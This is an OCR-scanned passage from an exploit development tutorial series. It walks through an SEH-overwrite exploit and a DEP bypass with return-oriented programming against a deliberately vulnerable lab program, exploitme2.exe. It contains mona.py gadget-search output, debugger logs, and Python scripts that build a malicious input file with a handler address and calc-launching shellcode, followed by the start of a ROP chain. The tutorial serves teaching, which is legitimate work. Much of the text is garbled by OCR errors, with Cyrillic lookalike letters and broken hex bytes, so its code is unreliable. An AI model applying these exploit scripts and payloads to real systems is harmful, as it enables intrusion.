- Number of pointers of type 'pop esi # pop ebp # retn 4' : 70 

- Number of pointers of type 'pop esi # pop ebp # retn 8' : 62 

- Number of pointers of type 'pop edx # pop eax # retn' : 1 

- Number of pointers of type ‘pop ебх # pop ebp # retn 8' : 26 

- Number of pointers of type 'pop ebx # pop ebp # retn 18h' : 6 
- Number of pointers of type 'рор ebx # pop ebp # retn 20h' : 2 


- Number of pointers of type 'pop eax # pop ebp # retn 10h' : 3 


- Number of pointers of type 'pop eax # pop ebp # retn 14h' : 3 
- Number of pointers of type 'pop ebx # pop ebp # retn' : 4 
- Number of pointers of type 'pop edi # pop ebp # retn 14h' : 2 
- Number of pointers of type 'pop edi # pop ebp £ retn 4' : 5 

[*] Results : 


0x75dd4e18 | 0x75dd4e18 (b+0x00014e18) : pop edi # pop ebp # retn 24h | (PAGE EXECUTE READ) [kernel32.dll] AS 
LR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dfd75d | Ox75dfd75d (b+0x0003d75d) : pop esi # pop ебх # retn | (PAGE EXECUTE READ) [kernel32.dll] ASLR: Tr 
ue, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dfd916 | Ox75dfd916 (b+0x0003d916) : pop esi # pop ебх # retn | (PAGE EXECUTE READ) [kernel32.dll] ASLR: Tr 
ue, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dd4f7c | Ох75аа4 с (b+0x00014f7c) : pop ebx # pop ebp # retn 14h | {PAGE_EXECUTE_READ} [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75ddf840 | Ox75ddf840 (b+0x0001f840) : рор ebx # pop ebp # retn 14h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dfcica| 0х75аїс1са (b*0x0003c1ca) : pop ебх # pop ebp # retn 14h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 
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0x75e7a327 | 0х75е7а327 (b+0x000ba327) : pop ебх # pop ebp # retn 14h | (PAGE EKECUTE READ) [kernel32.dll] А 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0х754е1267 | 0х754е1267 (b+0x00021267) : pop ebx # pop ebp # retn 10h | (PAGE EKECUTE READ) [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75defda1 | Ox75defda1 (b+0x0002fda1) : pop ебх # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75dfb33c | Ox75dfb33c (b+0x0003b33c) : рор ebx # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dfbf8a | Ox75dfbf8a (b--0x0003bf8a) : pop ebx # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
R: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


Ox75dfda42 | Ox75dfda42 (b+0x0003da42) : pop ерх # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] AS 
LR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0х75е45960 | 0х75е45960 (b+0x00085960) : pop ebx # pop ebp # retn 10h | {РАСЕ EKECUTE READ) [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e47b36 | 0x75e47b36 (b+0x00087b36) : pop ebx # pop ebp # retn 10h | (PAGE EXECUTE READ] [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e4a53f | 0x75e4a53f (b*0x0008a53f) : рор ebx # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] ASL 


В: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e5e294 | 0x75e5e294 (b+0x0009e294) : рор ебх # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e65641 | 0x75e65641 (b+0x000a5641) : pop ebx # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0х75еба121 | 0х75еба121 (6+0х000аа121) : pop ebx # pop ebp # retn 10h | (PAGE EKECUTE READ) [kernel32.dll] А 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e77bf1 | Ox75e77bf1 (b+0x000b7bf1) : pop ерх # pop ebp # retn 10h | (PAGE EXECUTE READ) [kernel32.dll] ASL 
В: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


0x75e7930d | Ох75е7930а (b+0x000b930d) : pop ебх # pop ebp # retn 10h | (PAGE EKECUTE READ) [kernel32.dll] A 
SLR: True, Rebase: False, SafeSEH: True, OS: True, v6.1.7601.18409 (C:\Windows\syswow64\kernel32.dll) 


... Please wait while I'm processing all remaining results and writing everything to file... 
[*] Done. Only the first 20 pointers are shown here. For more pointers, open findwild.txt... 


Found a total of 396 pointers 


[+] This топа.ру action took 0:00:12.400000 





Let's choose the second one: 
Ox75dfd75d | Ox75dfd75d (b+0x0003d75d) : pop esi # pop ебх # retn 


So our schema becomes like this: 
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alailala|/b|b/b/b shellcode 
ЕВ 06 90 9050 07 DF 75 А 
(3) 


(1) 

у 
pop esi 
pop ерх 
ret 





Here's the Python code to create 
Python 


th open(‘c:\\name.dat’, мр") as f: 

jmp = ‘\xeb\x06\x90\x90' 

handler = '\x5d\xd7\xdf\x75' 

shellcode = ("\xe8\xff\xffixffixffixcO\x5fixb9\x1 1\x03\x02\x02\x81\xf1\x02\x02"+ 
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x02\x0fi\x44\xc6\xaa"+ 
"\xe2\xf6\x55\x8b\xec\x83\xec\x0c\x56\x57\xb9\x7fixc0\xb4\x7b\xe8"+ 
"\x55\x02\x02\x02\xb9\xe0\x53\x31\x4b\x8b\xf8\xe8\x49\x02\x02\x02"+ 
"\x8b\xfO\xc7\x45\xf4\x63\x61\x6c\x63\x6a\x05\x8d\x45\xf4\xc7\x45"+ 
"\xf8\x2e\x65\x78\x65\x50\xc6\x45\xfc\x02\xffixd7\x6a\x02\xffixd6"+ 
"\x5f\x33\xcO\x5e\x8b\xed\x5d\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c"+ 
"\x6 1\xOf\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x4 1\x8a\x01\x84\xcO"+ 
"\x75\xea\x8b\xc2\xc3\x8d\x4 1\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53"+ 
"\x56\x57\x89\x4d\xf4\x64\xa 1\x30\x02\x02\x02\x89\x45\xfc\x8b\x45"+ 
"\xfc\x8b\x40\xOc\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8b\xcfixe8\xd2"+ 
"\xff\xffixffix8b\x3fx8b\x70\x1 8\x85\xf6\x74\x4f\x8b\x46\x3c\x8b"+ 
"\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff"+ 
"\xff\xffix8b\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xcO\x89\x4d\xfO"+ 
"\x89\x45\xfc\x39\x44\x33\x 1 8\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75"+ 
"\xff\xffixffix03\x45\xf8\x39\x45\xf4\x74\x 1 e\x8b\x45\xfc\x8b\x4d"+ 
"\xf0\x40\x89\x45\xfc\x3b\x44\x33\x18\x72\xdelx3b\x7d\xec\x75\x9c"+ 
"\x33\xcO\x5fix5e\x5b\x8b\xe5\x5d\xc3\x8b\x4 d\xfc\x8b\x44\x33\x24"+ 
"\x8d\x04\x48\xO0f\xb7\x0c\x30\x8b\x44\x33\x1 cl\x8d\x04\x88\x8b\x04"+ 
"\x30\x03\xc6\xeb\xdd") 

data = 'a'*84 + jmp + handler + shellcode 

f.write(data + 'c' * (10000 - len(data))) 





If you debug in WinDbg you'll see that there's something wrong. It seems that our handler 
) is not called. Why? 
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Let's have а look at {Ве loaded modules: 


0:000> !py mona modules 
Hold on... 
[+] Command used: 


Іру mona.py modules 


[*] Processing arguments and criteria 
- Pointer access level : Х 

[+] Generating module info table, hang on... 
- Processing modules 


- Done. Let's rock 'n roll. 


| Size | Rebase | SafeSEH | ASLR | NXCompat | OS DII | Version, Modulename & Path 


0x774b0000 | 0x774ba000 | 0х0000а000 | False | True 
yswow64\LPK.dll) 


0x00190000 | 0x00196000 | 0x00006000 | False | True 


0х75240000 | 0х7532а000 | 0х0005а000 | False | True 
ysWOW64\guard32.dll) 


0x764c0000 | 0х7658с000 | 0х000сс000 | False | True 
s\syswow64\MSCTF.dIl) 


0x76360000 | 0x763a7000 | 0x00047000 | False | True 
\Windows\syswow64\KERNELBASE. dll) 


0х752с0000 | 0x752c9000 | 0x00009000 | False | True 
ows\SysWOW64\VERSION.dIl) 


0x752b0000 | 0x752b7000 | 0x00007000 | False | True 
ysWOW 64 \fitlib. dll) 


0x758c0000 | 0x7595d000 | 0x00094000 | False | True 
ows\syswow64\USP 10.dll) 


0x75b50000 | 0x75be0000 | 0x00090000 | False | True 
s\syswow64\GD132.dll) 
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| True | True 


| True |6.1.7601.18768 [LPK.dll] (C:\Windows\s 


| True | False |False | -1.0- [exploitme2.exe] (exploitme2.exe) 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | 8.0.0.4344 [guard32.dll] (C:\Windows\S 


| True | 6.1.7601.18731 [MSCTF.dll] (C:\Window 


| True | 6.1.7601.18409 [KERNELBASE.dll] (С: 


| True | 6.1.7600.16385 [VERSION.dll] (C:\Wind 


| True | 6.1.7600.16385 [fltlib.dll] (C:\Windows\S 


| True | 1.626.7601.18454 [USP10.dll] (C:\Wind 


| True | 6.1.7601.18577 [GDI32.dll] (C:\Window 
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0х754с0000 | 0х75е90000 | 0х00110000 | False | True 
ws\syswow64\kernel32.dll) 


0x75960000 | 0x75a0c000 | 0х000ас000 | False | True 
s\syswow64\msvert.dll) 


0х75550000 | 0х7555с000 | 0х0000с000 | False | True 
\Windows\syswow64\CRYPTBASE.dIl) 


0x75560000 | 0x755c0000 | 0x00060000 | False | True 
s\syswow64\SspiCli.dll) 


0x77bd0000 | 0x77d50000 | 0х00180000 | False | True 


0x75ed0000 | 0х751770000 | Ох000а0000 | False | True 
ows\syswow64\ADVAPI32.dll) 


0х77660000 | 0х77750000 | 0х000#0000 | False | True 
ws\syswow64\RPCRT4.dll) 


0x6d510000 | 0x6d5fe000 | 0х000ее000 | False | True 
ws\SysWOW64\MSVCR120.dll) 


0x764a0000 | 0x764b9000 | 0x00019000 | False | True 
ws\SysWOW64\sechost.dll) 


0x75ab0000 | Ох75а65000 | 0х00005000 | False | True 
ws\syswow64\PSAPI.DLL) 


0x761c0000 | 0x762c0000 | 0x00100000 | False | True 
ws\syswow64\USER32.dll) 


0x762f0000 | 0x76350000 | 0x00060000 | False | True 
wsYXSysWOW64NMMM32.DLL) 


[+] This топа.ру action took 0:00:00.110000 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True | True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| True 


| 6.1.7601.18409 [kernel32.dll] (C:\Windo 
| 7.0.7601.17744 [msvert.dll] (CAWindow 
| 6.1.7600.16385 [СКУРТВАЗЕ. а | (C: 

| 6.1.7601.187 79 [SspiCli.dll] (C:\Window 


| 6.1.7601.18247 [ntdll.dll] (ntdll.dll) 
| 6.1.7601.18247 [ADVAPI32.dll] (C:\Wind 


| 6.1.7601.18532 [RPCRT4.dll] (C:\Windo 
| 12.0.21005.1 [MSVCR120.dll] (C:\Windo 
| 6.1.7600.16385 [sechost.dll] (C:\Windo 

| 6.1.7600.16385 [PSAPI.DLL] (C:\Windo 
| 6.1.7601.17514 [USER32.dll] (C:\Windo 


| 6.1.7601.17514 [IMM32.DLL] (C:\Windo 





Here we can see that all the loaded modules have SafeSEH = True. This is bad news for us. If a module is 
compiled with SafeSEH, then it contains a list of the allowed SEH handlers and any handler whose address 
is contained in that module but not in the list is ignored. 


The address Ox75dfd75d is in the module kernel32.dll but not in the list of its allowed handlers so we can't 
use it. The common solution is to choose a module with SafeSEH - False, but in our case all the modules 


were compiled with SafeSEH enabled. 


Since we're just learning to walk here, let's recompile exploitme2.exe without SafeSEH by changing the 


configuration in VS 2013 as follows: 


• Configuration Properties 
o Linker 


= 1045 
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. Advanced 
. Image Has Safe Exception Handlers: No (/(SAFESEH:NO) 


Мом let’s find a pop/pop/ret sequence inside exploitme2.exe: 


0:000> !py mona findwild -s "pop r32#pop r32#ret" -m exploitme2.exe 
Hold on... 
[+] Command used: 


Ipy mona.py findwild -s рор r32#pop r32#ret -m exploitme2.exe 


[+] Processing arguments and criteria 
- Pointer access level : X 
- Only querying modules exploitme2.exe 
[+] Type of search: str 
[+] Searching for matches up to 8 instructions deep 
[+] Generating module info table, hang on... 
- Processing modules 
- Done. Let's rock 'n roll. 
[+] Started search (8 start patterns) 
[+] Searching startpattern between 0x00e90000 and 0х00е96000 
[+] Preparing output file 'findwild.txt 
- (Re)setting logfile findwild.txt 


[+] Writing results to findwild.txt 


- Number of pointers of type 'pop eax # pop esi # retn' : 1 

- Number of pointers of type 'pop ecx # pop ecx # retn' : 1 

- Number of pointers of type 'pop edi # pop esi # retn' : 2 

- Number of pointers of type 'pop ecx # pop ebp # retn' : 1 

- Number of pointers of type 'pop ебх # pop ebp # retn' : 1 
[+] Results : 


0х00е91802 | 0х00е91802 (b+0x00001802) : pop eax # pop esi # retn | startnull (PAGE EXECUTE READ) [exploitme2.e 
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 


0х00е9152# | Ox00e9152f (b+0x0000152f) : pop ecx # pop ecx # retn | startnull (PAGE EKECUTE READ) [exploitme2.ex 
e] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 
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0x00e918e7 | Ox00e918e7 (b+0x000018e7) : pop edi # pop esi # retn | startnull (PAGE EXECUTE READ) [exploitme2.e 
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 


0x00e91907 | 0х00е91907 (b+0x00001907) : pop edi # pop esi # retn | startnull [PAGE EXECUTE READ) [exploitme2.e 
xe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 


0x00e9112b | Ox00e9112b (b+0x0000112b) : pop ecx # pop ebp £ retn | startnull (PAGE EXECUTE READ) [exploitme2. 
exe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 


0х00е91630 | 0х00е91630 (b+0x00001630) : pop ebx # pop ebp # retn | startnull (PAGE EXECUTE READ) [exploitme2. 
exe] ASLR: True, Rebase: False, SafeSEH: False, OS: False, v-1.0- (exploitme2.exe) 


Found a total of 6 pointers 


[+] This топа.ру action took 0:00:00.170000 





We'll use the first address: 0x00e91802. 
Here's the updated Python script: 
Python 


th open(‘c:\\name.dat', мр") as f: 

jmp = ‘\xeb\x06\x90\x90' 

handler = \х02\х18\хе9\х00' 

shellcode = ("\xe8\xff\xff\xffi\xffixcO\x5fixb9\x 1 1\x03\x02\x02\x81\xf1\x02\x02"+ 
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x02\x0f\x44\xc6\xaa"+ 
"\xe2\xf6\x55\x8b\xec\x83\xec\x0c\x56\x57\xb9\x7fixcO\xb4\x7b\xe8"+ 
"\x55\x02\x02\x02\xb9\xe0\x53\x31\x4b\x8b\xf8\xe8\x49\x02\x02\x02"+ 
"\x8b\xfO\xc7\x45\xf4\x63\x61\x6c\x63\x6a\x05\x8d\x45\xf4\xc7\x45"+ 
"\xf8\x2e\x65\x78\x65\x50\xc6\x45\xfc\x02\xffixd7\x6a\x02\xffixd6"+ 
"\x5f\x33\xcO\x5e\x8b\xed\x5d\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c"+ 
"\x6 1\xOf\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xcO"+ 
"\x75\xea\x8b\xc2\xc3\x8d\x4 1\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53"+ 
"\x56\x57\x89\x4 d\xf4\x64\xa 1\x30\x02\x02\x02\x89\x45\xfc\x8b\x45"+ 
"\xfc\x8b\x4.0\xOc\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8b\xcfixe8\xd2"+ 
"\xff\xffixffix8b\x3fAx8b\x70\x1 8\x85\xf6\x74\x4f\x8b\x46\x3c\x8b"+ 
"\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff"+ 
"\xff\xffix8b\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xcO\x89\x4d\xf0"+ 
"\x89\x45\xfc\x39\x44\x33\x 1 8\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75"+ 
"\xff\xffixffix03\x45\xf8\x39\x45\xf4\x74\x 1 e\x8b\x45\xfc\x8b\x4d"+ 
"\xf0\x4.0\x89\x45\xfc\x3b\x44\x33\x18\x72\xdelx3b\x7d\xec\x75\x9c"+ 
"\x33\xcO\x5fix5e\x5b\x8b\xe5\x5d\xc3\x8b\x4 d\xfc\x8b\x44\x33\x24"+ 
"\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x1 cl\x8d\x04\x88\x8b\x04"+ 
"\x30\x03\xc6\xeb\xdd") 

data = 'a'*84 + jmp + handler + shellcode 

f.write(data + 'c' * (10000 - len(data))) 





Run the script and open (the version without SafeSEH) in WinDbg. Now, as we expected, 
the calculator pops up! We did it, but we cheated a little bit. Also we're pretending there's no (for now). 
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Troubleshooting 


If the exploit doesn’t work on your system, it might be because of limited space on the stack. Read the 
article More space on the stack. 


127 http://expdev-kiuhnm.rhcloud.com 








EXPLOIT DEVELOPMENT COMMUNITY 


Ехр!онштез (РЕР) 


These articles are better read in order because they're part of a full course. | assume that you know the 
material in Exploitme1 and Exploitme2. 


This article is not easy to digest so take your time. | tried to be brief because | don't believe in repeating 
things many times. If you understand the principles behind ROP, then you can work out how everything 
works by yourself. After all, that's exactly what | did when | studied ROP for the first time. Also, you must be 
very comfortable with assembly. What does RET 0x4 do exactly? How are arguments passed to functions 
(in 32-bit code)? If you're unsure about any of these points, you need to go back to study assembly. You've 
been warned! 


Let’s get started... 


First of all, in VS 2013, ме’! disable stack cookies, but leave DEP on, by going to Project—properties, and 
modifying the configuration for Release as follows: 


. Configuration Properties 
о C/C++ 
. Code Generation 
. Security Check: Disable Security Check (/GS-) 


Make sure that DEP is activated: 


• Configuration Properties 
о Linker 
. Advanced 
. Data Execution Prevention (DEP): Yes (/INXCOMPAT) 


We'll use the same code as before: 
С++ 


#include <cstdio> 


irn -1; 

(f, OL, SEEK END); 

ytes - ftell(f); 

(О БЕЕК ЕГ 
fread(name, 1, bytes, f); 
name[bytes] = \0'; 
fclose(f); 
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printf(" 


i, %s!\n", name); 
n 0; 





Let's generate with the script we used for 
Python 


h ореп(с:Мпате.даг, мб') as f: 

ret eip = '\x80\xa9\xe1\x75' 

shellcode = ("\xe8\xffi\xfflxffixfflxcO\x5fixb9\x1 1\x03\x02\x02\x81\xf1\x02\x02"+ 
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x02\x0f\x44\xc6\xaa"+ 
"\xe2\xf6\x55\x8b\xec\x83\xec\x0c\x56\x57\xb9\x 7fixcO\xb4\x7b\xe8"+ 
"\x55\x02\x02\x02\xb9\xe0\x53\x31\x4b\x8b\xf8\xe8\x49\x02\x02\x02"+ 
"\x8b\xfO\xc7\x45\xf4\x63\x61\x6c\x63\x6alx05\x8d\x4.5\xf4\xc7\x45"+ 
"\xf8\x2e\x65\x7 8\x65\x50\xc6\x4.5\xfo\x02\xffixd7\x6a\x02\xffixd6"+ 
"\x5f\x33\xc0\x5e\x8b\xed\x5d\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c"+ 
"\x6 1\xOf\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xcO"+ 
"\x75\xea\x8b\xc2\xc3\x8d\x4 1\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53"+ 
"\x56\x57\x89\x4 d\xf4\x64\xa1\x30\x02\x02\x02\x89\x45\xfc\x8b\x45"+ 
"\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8b\xcfixe8\xd2"+ 
"\xff\xffixffix8b\x3fi\x8b\x70\x1 8\x85\xf6\x74\x4f\x8b\x46\x3c\x8b"+ 
"\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xcelxe8\x96\xff"+ 
"\xffi\xffix8b\x4.c\x33\x20\x89\x4.5\xf8\x03\xce\x33\xc0\x89\x4d\xf0"+ 
"\x89\x45\xfc\x39\x44\x33\x1 8\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75"+ 
"\xff\xff\xffix03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d"+ 
"\xfO\x40\x89\x45\xfe\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c"+ 
"\x33\xcO\x5f\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24"+ 
"\x8d\x04\x4.8\xO0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04"+ 
"\x30\x03\xc6\xeb\xdd") 

name = 'a'*36 + ret eip + shellcode 

f.write(name) 





Note that | had to change because | rebooted Windows. Remember that the command to find a 
instruction ог eguivalent code in is 


Іру mona jmp -r esp -m kernel32.dll 


If you run with DEP disabled, the exploit will work, but with DEP enabled the following 
exception is generated: 


(1ее8.сЗс): Access violation - code с0000005 (first chance) 


First chance exceptions are reported before апу exception handling. 


This exception may be expected and handled. 
еах=00000000 ебх=00000000 есх=64593071 ейх=005а556р еѕі=00000001 edi-00000000 
eip=002ef788 езр=002е!788 ебр=61616161 іорі-0 nv up ei pl zr na pe nc 
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cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 


002ef788 ee8ffffffff call OO2ef78c 





Note that EIP = ESP, so we just jumped to ESP, but something went wrong. If we disassemble the code at 
EIP, we see that it's indeed our shellcode: 


0:000> u eip 

002ef788 ee8ffffffff call O02ef78c 

002ef78d с051р911 rcr byte ptr [edi-47h],11h 
002ef791 0302 add eax,dword ріг [edx] 

002ef793 0281f1020202 ада al,byte ptr [ecx+20202F 1h] 
002ef799 0283c71d33f6 add  al,byte ptr [ebx-9CCE239h] 
002ef79f fc cld 

002ef7a0 8a07 mov  al,byte ptr [edi] 

002ef7a2 3c02 стр 281,2 





Here’s a portion of our shellcode (see the Python script above): 


\xe8\xffixffixffixffixcO\x5fixb9\x1 1\x03\x02\x02\x81\xf1\x02\x02 


As you can see, the bytes match. 
So what’s wrong? The problem is that the page which contains this code is marked as non executable. 


Here's what you'll see when the page is executable: 


0:000> !vprot @eip 

BaseAddress: 77c71000 

А!осаНопВазе: 77690000 

AllocationProtect: 00000080 PAGE EKECUTE WRITECOPY 


RegionSize: 00045000 

State: 00001000 MEM_COMMIT 

Protect: 00000020 PAGE_EXECUTE_READ 
Type: 01000000 MEM_IMAGE 





The most important line is 


Protect: 00000020 PAGE_EXECUTE_READ 
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which means that the page is readonly and executable. 


In our case, after the exception, we see something different: 


0:000> !vprot @eip 

BaseAddress: 0028f000 

А!осаНопВазе: 00190000 

AllocationProtect: 00000004 PAGE READWRITE 


RegionSize: 00001000 

State: 00001000 MEM_COMMIT 
Protect: 00000004 PAGE READWRITE 
Type: 00020000 MEM PRIVATE 





The page is readable апа writable but not executable. 


Simply put, DEP (Data Execution Prevention) marks all the pages containing data as non-executable. This 
includes stack and heap. The solution is simple: don’t execute code on the stack! 


The technique to do that is called ROP which stands for Return-Oriented Programming. The idea is simple: 


1. reuse pieces of code already present in the modules 
2. use the stack only to control data and the flow of execution 


Consider the following three pieces of code: 
Assembly (x86) 





piece1, piece2 and piece3 are three labels and represent addresses in memory. We'll use them instead of 
the real addresses for convenience. 


Now let's put the following values on the stack: 


esp --> value for eax 
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value for ebx 


piece2 
piece3 


value for edx 





If in the beginning and we let the code run, here's what will happen: 


 piecet: 
eip ———> pop eax + —— — — үаіие for eax «——— esp 
pop ebx + --- value for ерх 
ret ~H piece2 
— piece3 
piece2: value_for_edx 
mov ecx, 4 some_function 
гё Е Јо 


| piece3: 
5 pop edx 





The schema should be clear, but let’s examine it step by step: 


1: The execution starts at and points to : 

2. puts into ( : now points to ). 
3: puts into ( : NOW points to ). 

4. pops and jumps to ( : now points to ). 

5. puts 4 into 

6. pops and jumps to ( : now points to ). 

7. puts into ( : now points to ). 
8. pops and jumps to 

We assume that never returns. 
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By now it should be clear why this technique is called ROP: the instruction RET is used to jump from one 
piece of code to the next. The pieces of code are usually called gadgets. А gadget is just а sequence of 
instructions which ends with a RET instruction. 


The hard partis finding and chaining together the right gadgets to achieve our goals. 


Calling WinExec directly 
For our exploit we want to execute what follows: 


С++ 


WinExec("calc.exe", SW SHOW); 





ExitThread(0); 


Here’s the corresponding code in assembly: 


WinExec("calc.exe", SW SHOW); 
00361000 6A 05 push 5 
00361002 68 00 21 36 00 push 362100h 
00361007 FF 1504 20 36 00 call dword ptr ds:[362004h] 


ExitThread(0); 
0036100D 6A 00 push 
0036100F FF 15 00 20 3600 са! dword ptr ds:[362000h] 





One important thing that we note is that WinExec() and ExitThread() remove the arguments from the stack 
on their own (by using ret 8 and ret 4, respectively). 


362100h is the address of the string calc.exe located in the .rdata section. We'll need to put the string 
directly on the stack. Unfortunately the address of the string won't be constant so we'll have to compute it at 
runtime. 


First of all, we'll find all the interesting gadgets in kernel32.dll, па! and msvcr120.dll. We'll use mona 
(article) once again. If you didn’t do so, set mona’s working directory with: 


1ру mona config -set workingfolder "C:\logs\%p" 


You're free to change the directory, of course. The term %р will be replaced each time with the name of the 
executable you're working on. 


Here’s the command to find the rops: 


ру mona rop -m kernel32.dll,ntdll,msvcr120.dll 


This will output а lot of data апа generate the following files (located іп the directory specified above): 
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rop.txt 
rop_chains.txt 
rop_suggestions.txt 
stackpivot.txt 


Review the files to see what kind of information they contain. 


To call WinExec and ExitThread, we need to set up the stack this way: 


cmd: "calc" 


WinExec 

ExitThread 

cmd # arg1 of WinExec 

5 # arg2 (uCmdShow) of WinExec 


ret for ExitThread # not used 
dwExitCode # arg1 of ExitThread 





If we execute RET when ESP points at the location indicated above, WinExec will be executed. WinExec 
terminates with a RETN 8 instruction which extract the address of ExitThread from the stack, jumps to 
ExitThread and remove the two arguments from the stack (by incrementing ESP by 8). ExitThread will use 
dwExitCode located on the stack but won't return. 


There are two problems with this schema: 


1: some bytes аге null; 
2. cmd is non-constant so the arg of WinExec must be fixed at runtime. 


Note that in our case, since all the data is read from file through fread(), we don't need to avoid null bytes. 
Anyway, to make things more interesting, we'll pretend that no null bytes may appear in our ROP chain. 
Instead of 5 (SW SHOW), we can use 0x01010101 which seems to work just fine. The first null dword is 
used to terminate the cmd string so we'll need to replace it with something like Oxffffffff and zero it out at 
runtime. Finally, we'll need to write cmd (i.e. the address of the string) on the stack at runtime. 


The approach is this: 
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gadget 1 
"calc" 
“exe” 


WinExec 
220) ExitThread 
increment 
ESP 


ret for ExitThread 
dwExitCode 


gadget2a 
gadget2z 


(4) gadget3a 

decrement n 
ESP 

gadget3z 


gadget4a 


gadget4z 





First, we skip (by incrementing ) the part of the stack we want to fix. Then we fix that part and, finally, 
ме jump back (by аесгетеп па ) to the part we fixed and "execute it" (only т а sense, since this is 
КОР). 

Here's a Python script which creates 

Python 


rt struct 


(file path): 
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120 = Ox6cf70000 
2 = 0х77120000 
= 0х77630000 


= + Ox92ff1 
= пай + 0x5801c 
= Oxffffffff 
= 0х01010101 
= OXffffffff 
| = Oxffffffff 


= OXffffffff 
= Oxffffffff 
= Oxffffffff 

= Oxffffffff 


ver120 + Охе0418, 


Ох, 


+ Oxa3f07, 


+ 0х45042, 


+ 0x92aa3, 
+ 0x92aa3, 
+ 0x92aa3, 3 


+ 0x92aa3, 3 
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+ 0x92aa3, 3 


+ Oxbfe65, ! 


> + Oxb7804, 


